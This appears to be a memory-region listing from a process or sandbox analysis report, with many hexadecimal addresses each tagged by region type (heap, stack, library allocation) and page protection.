2A2D1370000
|
heap
|
page read and write
|
||
205680BC000
|
trusted library allocation
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
C53567F000
|
unkown
|
page read and write
|
||
7FF848F35000
|
trusted library allocation
|
page execute and read and write
|
||
2A2D143A000
|
heap
|
page read and write
|
||
7FF848E28000
|
trusted library allocation
|
page read and write
|
||
923000
|
heap
|
page read and write
|
||
850000
|
trusted library allocation
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
1C21E000
|
stack
|
page read and write
|
||
1B146F03000
|
trusted library allocation
|
page read and write
|
||
2A2B7270000
|
heap
|
page readonly
|
||
2A2C91B1000
|
trusted library allocation
|
page read and write
|
||
1DB1A64D000
|
trusted library allocation
|
page read and write
|
||
2A2960D000
|
stack
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
1B14F16F000
|
heap
|
page read and write
|
||
2055614C000
|
heap
|
page read and write
|
||
1B14F053000
|
heap
|
page read and write
|
||
2A2C93ED000
|
trusted library allocation
|
page read and write
|
||
20690285000
|
trusted library allocation
|
page read and write
|
||
1B784000
|
stack
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
FEE677F000
|
stack
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
1B130000
|
heap
|
page execute and read and write
|
||
12C2D000
|
trusted library allocation
|
page read and write
|
||
1DB182EC000
|
heap
|
page read and write
|
||
1700000
|
trusted library allocation
|
page read and write
|
||
1B146E4D000
|
trusted library allocation
|
page read and write
|
||
AA8000
|
heap
|
page read and write
|
||
1DB18313000
|
heap
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
2A2C91D7000
|
trusted library allocation
|
page read and write
|
||
FEE7A0C000
|
stack
|
page read and write
|
||
12693000
|
trusted library allocation
|
page read and write
|
||
1DB1B23D000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
2A2BADB7000
|
trusted library allocation
|
page read and write
|
||
20567F31000
|
trusted library allocation
|
page read and write
|
||
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
13DF000
|
heap
|
page read and write
|
||
C96A2F9000
|
stack
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
28E66795000
|
heap
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
2A2B9D08000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
206ED0D7000
|
heap
|
page read and write
|
||
1B59E000
|
stack
|
page read and write
|
||
1DB1BF5C000
|
trusted library allocation
|
page read and write
|
||
1B137641000
|
trusted library allocation
|
page read and write
|
||
1B146E7D000
|
trusted library allocation
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
1ADAF000
|
stack
|
page read and write
|
||
1DB3252F000
|
heap
|
page read and write
|
||
14FA000
|
heap
|
page read and write
|
||
264E000
|
stack
|
page read and write
|
||
1B138A10000
|
trusted library allocation
|
page read and write
|
||
1B146FAB000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
1B146FC2000
|
trusted library allocation
|
page read and write
|
||
B98000
|
heap
|
page read and write
|
||
1B58E000
|
stack
|
page read and write
|
||
1BD6E000
|
stack
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
28E4C53E000
|
heap
|
page read and write
|
||
251A000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
trusted library allocation
|
page read and write
|
||
28E66590000
|
heap
|
page execute and read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
6A0000
|
trusted library allocation
|
page read and write
|
||
F70000
|
heap
|
page read and write
|
||
1B146DE7000
|
trusted library allocation
|
page read and write
|
||
205683B0000
|
trusted library allocation
|
page read and write
|
||
2A2C926F000
|
trusted library allocation
|
page read and write
|
||
20568086000
|
trusted library allocation
|
page read and write
|
||
12CB1000
|
trusted library allocation
|
page read and write
|
||
C5358F9000
|
stack
|
page read and write
|
||
206EB22D000
|
heap
|
page read and write
|
||
7FF848FC7000
|
trusted library allocation
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
1DB322E0000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
206ED800000
|
heap
|
page read and write
|
||
8BA000
|
heap
|
page read and write
|
||
7FF848FB9000
|
trusted library allocation
|
page read and write
|
||
1507000
|
heap
|
page read and write
|
||
7FF849182000
|
trusted library allocation
|
page read and write
|
||
205683D5000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
BBC000
|
heap
|
page read and write
|
||
754000
|
heap
|
page read and write
|
||
2A2C90BD000
|
trusted library allocation
|
page read and write
|
||
C96A3B7000
|
stack
|
page read and write
|
||
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
2A2B7030000
|
heap
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
2A2C9287000
|
trusted library allocation
|
page read and write
|
||
1B05F000
|
stack
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849143000
|
trusted library allocation
|
page read and write
|
||
2069027F000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
7FF848F25000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
15BE000
|
heap
|
page read and write
|
||
12821000
|
trusted library allocation
|
page read and write
|
||
1BA97000
|
heap
|
page read and write
|
||
1715000
|
heap
|
page read and write
|
||
12BAD000
|
trusted library allocation
|
page read and write
|
||
1B146F8F000
|
trusted library allocation
|
page read and write
|
||
7FF848F15000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C9140000
|
trusted library allocation
|
page read and write
|
||
1B3BE000
|
stack
|
page read and write
|
||
AF6000
|
stack
|
page read and write
|
||
1B147097000
|
trusted library allocation
|
page read and write
|
||
1B147041000
|
trusted library allocation
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
C535B7A000
|
stack
|
page read and write
|
||
24EF000
|
stack
|
page read and write
|
||
28E66793000
|
heap
|
page read and write
|
||
5C8000
|
heap
|
page read and write
|
||
2A2D1154000
|
heap
|
page read and write
|
||
181F000
|
stack
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
20570110000
|
heap
|
page execute and read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C9336000
|
trusted library allocation
|
page read and write
|
||
24F8000
|
trusted library allocation
|
page read and write
|
||
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
2A2C92C4000
|
trusted library allocation
|
page read and write
|
||
CC4CE8E000
|
stack
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
1B146FE5000
|
trusted library allocation
|
page read and write
|
||
28E4FB3E000
|
trusted library allocation
|
page read and write
|
||
20690420000
|
trusted library allocation
|
page read and write
|
||
20567FC6000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
1B14700B000
|
trusted library allocation
|
page read and write
|
||
2056839D000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
206EB250000
|
heap
|
page read and write
|
||
DC5000
|
heap
|
page read and write
|
||
7FF848FBE000
|
trusted library allocation
|
page read and write
|
||
1A8F0000
|
trusted library allocation
|
page read and write
|
||
20690295000
|
trusted library allocation
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
28E4E2B1000
|
trusted library allocation
|
page read and write
|
||
FEE63F3000
|
stack
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
FEE790E000
|
stack
|
page read and write
|
||
20568105000
|
trusted library allocation
|
page read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
F1F000
|
heap
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
23E0000
|
heap
|
page execute and read and write
|
||
1B8BD000
|
stack
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
1DB1B422000
|
trusted library allocation
|
page read and write
|
||
205680ED000
|
trusted library allocation
|
page read and write
|
||
626000
|
heap
|
page read and write
|
||
1250000
|
heap
|
page read and write
|
||
1B468000
|
heap
|
page read and write
|
||
28E662BA000
|
heap
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
790000
|
heap
|
page read and write
|
||
C96A27D000
|
stack
|
page read and write
|
||
2A2C92B8000
|
trusted library allocation
|
page read and write
|
||
2056803C000
|
trusted library allocation
|
page read and write
|
||
13EA000
|
heap
|
page read and write
|
||
7FF8491FC000
|
trusted library allocation
|
page read and write
|
||
13DD000
|
heap
|
page read and write
|
||
7FF84916C000
|
trusted library allocation
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
205561F0000
|
trusted library allocation
|
page read and write
|
||
7DF4941F0000
|
trusted library allocation
|
page execute and read and write
|
||
C5353EE000
|
stack
|
page read and write
|
||
7FF848F9E000
|
trusted library allocation
|
page read and write
|
||
1DB1B356000
|
trusted library allocation
|
page read and write
|
||
12799000
|
trusted library allocation
|
page read and write
|
||
B55000
|
heap
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
B95000
|
heap
|
page read and write
|
||
FC0000
|
heap
|
page read and write
|
||
2069043B000
|
trusted library allocation
|
page read and write
|
||
1B77D000
|
stack
|
page read and write
|
||
7FF84917A000
|
trusted library allocation
|
page read and write
|
||
1DB32627000
|
heap
|
page read and write
|
||
20556173000
|
heap
|
page read and write
|
||
2A2C93FC000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
28E5E599000
|
trusted library allocation
|
page read and write
|
||
1B146FBC000
|
trusted library allocation
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
20690426000
|
trusted library allocation
|
page read and write
|
||
14F8000
|
heap
|
page read and write
|
||
205560F0000
|
heap
|
page read and write
|
||
1B2B3000
|
stack
|
page read and write
|
||
7FF848E33000
|
trusted library allocation
|
page read and write
|
||
2710000
|
heap
|
page execute and read and write
|
||
1CC12000
|
heap
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
1B4BF000
|
stack
|
page read and write
|
||
7FF848F25000
|
trusted library allocation
|
page execute and read and write
|
||
126D8000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
20690291000
|
trusted library allocation
|
page read and write
|
||
7FF848FB7000
|
trusted library allocation
|
page read and write
|
||
1B6A0000
|
heap
|
page read and write
|
||
2A2C9436000
|
trusted library allocation
|
page read and write
|
||
2140000
|
trusted library allocation
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
123F000
|
stack
|
page read and write
|
||
1B1389F0000
|
trusted library allocation
|
page read and write
|
||
28E665C0000
|
heap
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
1B134DD0000
|
heap
|
page read and write
|
||
1B14F0CF000
|
heap
|
page read and write
|
||
FEE6979000
|
stack
|
page read and write
|
||
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
20690393000
|
trusted library allocation
|
page read and write
|
||
32AB000
|
trusted library allocation
|
page read and write
|
||
1AA5D000
|
stack
|
page read and write
|
||
205704C2000
|
heap
|
page read and write
|
||
DA8000
|
heap
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
205682E2000
|
trusted library allocation
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
20558981000
|
trusted library allocation
|
page read and write
|
||
2A2BA8EE000
|
trusted library allocation
|
page read and write
|
||
1580000
|
heap
|
page read and write
|
||
2A2C934E000
|
trusted library allocation
|
page read and write
|
||
2056836E000
|
trusted library allocation
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
2A2D1220000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
25CC000
|
trusted library allocation
|
page read and write
|
||
858000
|
heap
|
page read and write
|
||
906000
|
heap
|
page read and write
|
||
1B72F000
|
stack
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
1DB1B4BC000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C9068000
|
trusted library allocation
|
page read and write
|
||
1DB3259D000
|
heap
|
page read and write
|
||
20570140000
|
heap
|
page read and write
|
||
1B146E90000
|
trusted library allocation
|
page read and write
|
||
1B86E000
|
stack
|
page read and write
|
||
1B14EDF3000
|
heap
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
750000
|
heap
|
page read and write
|
||
10F0000
|
heap
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page execute and read and write
|
||
1B147054000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
576000
|
stack
|
page read and write
|
||
FD7000
|
heap
|
page read and write
|
||
BD9000
|
heap
|
page read and write
|
||
7DF465DE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F35000
|
trusted library allocation
|
page execute and read and write
|
||
AD0000
|
heap
|
page read and write
|
||
2068102F000
|
trusted library allocation
|
page read and write
|
||
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
7DF469190000
|
trusted library allocation
|
page execute and read and write
|
||
1DB182D2000
|
heap
|
page read and write
|
||
20690239000
|
trusted library allocation
|
page read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
1640000
|
heap
|
page read and write
|
||
1B89E000
|
heap
|
page read and write
|
||
2A2C90ED000
|
trusted library allocation
|
page read and write
|
||
1B684000
|
stack
|
page read and write
|
||
2A2C93CB000
|
trusted library allocation
|
page read and write
|
||
BB6000
|
heap
|
page read and write
|
||
C08000
|
heap
|
page read and write
|
||
C60000
|
heap
|
page read and write
|
||
1B146E78000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
C5353A3000
|
stack
|
page read and write
|
||
20568005000
|
trusted library allocation
|
page read and write
|
||
BCF000
|
heap
|
page read and write
|
||
FEE6DBD000
|
stack
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
1B146F2C000
|
trusted library allocation
|
page read and write
|
||
260E000
|
trusted library allocation
|
page read and write
|
||
205680C9000
|
trusted library allocation
|
page read and write
|
||
2A2B70A3000
|
heap
|
page read and write
|
||
2A2C9086000
|
trusted library allocation
|
page read and write
|
||
1C80E000
|
stack
|
page read and write
|
||
28E5E2FB000
|
trusted library allocation
|
page read and write
|
||
7FF849133000
|
trusted library allocation
|
page read and write
|
||
309E000
|
stack
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
20690001000
|
trusted library allocation
|
page read and write
|
||
1492000
|
heap
|
page read and write
|
||
BF8000
|
heap
|
page read and write
|
||
7FF848F97000
|
trusted library allocation
|
page read and write
|
||
20568289000
|
trusted library allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
CC4BD7B000
|
stack
|
page read and write
|
||
1B146BF1000
|
trusted library allocation
|
page read and write
|
||
20681E26000
|
trusted library allocation
|
page read and write
|
||
2056816A000
|
trusted library allocation
|
page read and write
|
||
1186000
|
stack
|
page read and write
|
||
206ED585000
|
heap
|
page read and write
|
||
7FF848F35000
|
trusted library allocation
|
page execute and read and write
|
||
1DB32390000
|
heap
|
page execute and read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
1B8CA000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
20568009000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
1BD30000
|
heap
|
page execute and read and write
|
||
2069029F000
|
trusted library allocation
|
page read and write
|
||
2A2C8FC1000
|
trusted library allocation
|
page read and write
|
||
14FD000
|
heap
|
page read and write
|
||
205681C1000
|
trusted library allocation
|
page read and write
|
||
20557BE0000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
20690406000
|
trusted library allocation
|
page read and write
|
||
127A7000
|
trusted library allocation
|
page read and write
|
||
206EB1F0000
|
heap
|
page read and write
|
||
20568013000
|
trusted library allocation
|
page read and write
|
||
BDC000
|
heap
|
page read and write
|
||
BCA000
|
heap
|
page read and write
|
||
320D000
|
trusted library allocation
|
page read and write
|
||
7DF4CBEA0000
|
trusted library allocation
|
page execute and read and write
|
||
C5367CE000
|
stack
|
page read and write
|
||
3297000
|
trusted library allocation
|
page read and write
|
||
1B14701A000
|
trusted library allocation
|
page read and write
|
||
1B060000
|
heap
|
page read and write
|
||
2490000
|
trusted library allocation
|
page read and write
|
||
1B137D0F000
|
trusted library allocation
|
page read and write
|
||
2AB7000
|
trusted library allocation
|
page read and write
|
||
2A2B70AB000
|
heap
|
page read and write
|
||
2606000
|
trusted library allocation
|
page read and write
|
||
1B6B8000
|
heap
|
page read and write
|
||
2B38000
|
trusted library allocation
|
page read and write
|
||
1B134D70000
|
heap
|
page read and write
|
||
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
1B645000
|
heap
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
1B146FD0000
|
trusted library allocation
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
1DB2A46D000
|
trusted library allocation
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
BBB000
|
heap
|
page read and write
|
||
1B8CD000
|
heap
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
2A2D1395000
|
heap
|
page read and write
|
||
987000
|
heap
|
page read and write
|
||
17F5000
|
heap
|
page read and write
|
||
1B462000
|
heap
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
F50000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
DF5000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
2A2816F000
|
unkown
|
page read and write
|
||
2A2B6FC0000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
284E000
|
trusted library allocation
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
3235000
|
trusted library allocation
|
page read and write
|
||
20558FED000
|
trusted library allocation
|
page read and write
|
||
2420000
|
heap
|
page execute and read and write
|
||
1145000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
2A2C907C000
|
trusted library allocation
|
page read and write
|
||
102B000
|
heap
|
page read and write
|
||
FEE788E000
|
stack
|
page read and write
|
||
148A000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
5E0000
|
heap
|
page read and write
|
||
2056817B000
|
trusted library allocation
|
page read and write
|
||
BCE000
|
heap
|
page read and write
|
||
1B147013000
|
trusted library allocation
|
page read and write
|
||
1AFA0000
|
heap
|
page read and write
|
||
BBB000
|
heap
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
1B671000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
28E667CC000
|
heap
|
page read and write
|
||
7FF849093000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
2832000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page execute and read and write
|
||
2056833A000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
1B6CF000
|
heap
|
page read and write
|
||
CC4BCFF000
|
stack
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
7E5000
|
heap
|
page read and write
|
||
1DB18170000
|
heap
|
page read and write
|
||
1B56E000
|
stack
|
page read and write
|
||
2BBB000
|
trusted library allocation
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
20690293000
|
trusted library allocation
|
page read and write
|
||
2A2B72F0000
|
heap
|
page execute and read and write
|
||
28B7000
|
trusted library allocation
|
page read and write
|
||
2B32000
|
trusted library allocation
|
page read and write
|
||
1B147056000
|
trusted library allocation
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
2A2C9173000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
14F0000
|
heap
|
page read and write
|
||
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
7FF848F25000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
126DD000
|
trusted library allocation
|
page read and write
|
||
2056FFCD000
|
heap
|
page read and write
|
||
1BB6E000
|
stack
|
page read and write
|
||
1B5EF000
|
stack
|
page read and write
|
||
7FF849092000
|
trusted library allocation
|
page read and write
|
||
2056801B000
|
trusted library allocation
|
page read and write
|
||
2069020A000
|
trusted library allocation
|
page read and write
|
||
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
206EB254000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
7FF848FEA000
|
trusted library allocation
|
page read and write
|
||
1DB1B211000
|
trusted library allocation
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
1BE4F000
|
stack
|
page read and write
|
||
2A2C9112000
|
trusted library allocation
|
page read and write
|
||
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
2A2B7335000
|
heap
|
page read and write
|
||
28E4F5B4000
|
trusted library allocation
|
page read and write
|
||
2A2B8C30000
|
trusted library allocation
|
page read and write
|
||
CC4BC7A000
|
stack
|
page read and write
|
||
20558F32000
|
trusted library allocation
|
page read and write
|
||
1B137FAE000
|
trusted library allocation
|
page read and write
|
||
2057014A000
|
heap
|
page read and write
|
||
2A2C90A1000
|
trusted library allocation
|
page read and write
|
||
259C000
|
trusted library allocation
|
page read and write
|
||
C96B18E000
|
stack
|
page read and write
|
||
28E500D6000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
2A2C930A000
|
trusted library allocation
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
1B146DF9000
|
trusted library allocation
|
page read and write
|
||
20690349000
|
trusted library allocation
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page execute and read and write
|
||
FEE6A78000
|
stack
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
91E000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
1390000
|
trusted library allocation
|
page read and write
|
||
1AE4D000
|
stack
|
page read and write
|
||
2A2C906A000
|
trusted library allocation
|
page read and write
|
||
1DB18270000
|
heap
|
page read and write
|
||
7FF8490B1000
|
trusted library allocation
|
page read and write
|
||
20568250000
|
trusted library allocation
|
page read and write
|
||
14D0000
|
heap
|
page read and write
|
||
2056838E000
|
trusted library allocation
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
206ED695000
|
heap
|
page read and write
|
||
7FF84908F000
|
trusted library allocation
|
page read and write
|
||
20556290000
|
trusted library allocation
|
page read and write
|
||
CE5000
|
heap
|
page read and write
|
||
2A2893E000
|
stack
|
page read and write
|
||
7FF849256000
|
trusted library allocation
|
page read and write
|
||
20690391000
|
trusted library allocation
|
page read and write
|
||
28E4F2DD000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
1DB18420000
|
heap
|
page readonly
|
||
206902CA000
|
trusted library allocation
|
page read and write
|
||
7FF84920C000
|
trusted library allocation
|
page read and write
|
||
2A29587000
|
stack
|
page read and write
|
||
20568255000
|
trusted library allocation
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
7FF848FD8000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
20556250000
|
trusted library allocation
|
page read and write
|
||
6F6000
|
stack
|
page read and write
|
||
7FF849162000
|
trusted library allocation
|
page read and write
|
||
7FF84926D000
|
trusted library allocation
|
page read and write
|
||
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
2ABA000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
1B136E18000
|
trusted library allocation
|
page read and write
|
||
2055612E000
|
heap
|
page read and write
|
||
20557A7B000
|
heap
|
page read and write
|
||
28E4C4E0000
|
trusted library allocation
|
page read and write
|
||
28E4C500000
|
heap
|
page read and write
|
||
205681EC000
|
trusted library allocation
|
page read and write
|
||
C5368C7000
|
stack
|
page read and write
|
||
2056FF40000
|
heap
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF84901A000
|
trusted library allocation
|
page read and write
|
||
1B7FE000
|
stack
|
page read and write
|
||
2560000
|
heap
|
page read and write
|
||
20568172000
|
trusted library allocation
|
page read and write
|
||
1AAB0000
|
trusted library allocation
|
page read and write
|
||
205681F0000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
28E66454000
|
heap
|
page read and write
|
||
2A2C91E0000
|
trusted library allocation
|
page read and write
|
||
1B740000
|
heap
|
page read and write
|
||
7FF849170000
|
trusted library allocation
|
page read and write
|
||
2A2C909F000
|
trusted library allocation
|
page read and write
|
||
28E4E130000
|
trusted library allocation
|
page read and write
|
||
205682DB000
|
trusted library allocation
|
page read and write
|
||
206903A0000
|
trusted library allocation
|
page read and write
|
||
1B1389CB000
|
trusted library allocation
|
page read and write
|
||
7FF848F25000
|
trusted library allocation
|
page execute and read and write
|
||
1B14F18F000
|
heap
|
page read and write
|
||
2680000
|
heap
|
page read and write
|
||
7FF848E18000
|
trusted library allocation
|
page read and write
|
||
3209000
|
trusted library allocation
|
page read and write
|
||
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
1890000
|
heap
|
page read and write
|
||
7E6000
|
stack
|
page read and write
|
||
329F000
|
trusted library allocation
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
1B46B000
|
stack
|
page read and write
|
||
1B146C11000
|
trusted library allocation
|
page read and write
|
||
C53597D000
|
stack
|
page read and write
|
||
93A000
|
heap
|
page read and write
|
||
1650000
|
trusted library allocation
|
page read and write
|
||
CC4BEBE000
|
stack
|
page read and write
|
||
264D000
|
trusted library allocation
|
page read and write
|
||
FEE6C39000
|
stack
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
3A0000
|
heap
|
page read and write
|
||
20570116000
|
heap
|
page execute and read and write
|
||
6B8000
|
heap
|
page read and write
|
||
20690357000
|
trusted library allocation
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
7FF849143000
|
trusted library allocation
|
page read and write
|
||
7FF849267000
|
trusted library allocation
|
page read and write
|
||
C96A5BE000
|
stack
|
page read and write
|
||
34ED000
|
trusted library allocation
|
page read and write
|
||
206903D1000
|
trusted library allocation
|
page read and write
|
||
1B14F17E000
|
heap
|
page read and write
|
||
2BF0000
|
heap
|
page execute and read and write
|
||
2B29000
|
trusted library allocation
|
page read and write
|
||
1B44F000
|
stack
|
page read and write
|
||
28E66709000
|
heap
|
page read and write
|
||
1AEAD000
|
stack
|
page read and write
|
||
1B146DD1000
|
trusted library allocation
|
page read and write
|
||
7FF848FB3000
|
trusted library allocation
|
page read and write
|
||
9E9028E000
|
stack
|
page read and write
|
||
20558C9B000
|
trusted library allocation
|
page read and write
|
||
2A2C9210000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
1DB3235D000
|
heap
|
page read and write
|
||
2A2D1240000
|
heap
|
page read and write
|
||
C53684E000
|
stack
|
page read and write
|
||
7FF849154000
|
trusted library allocation
|
page read and write
|
||
13188000
|
trusted library allocation
|
page read and write
|
||
7FF84908D000
|
trusted library allocation
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
20681003000
|
trusted library allocation
|
page read and write
|
||
1450000
|
heap
|
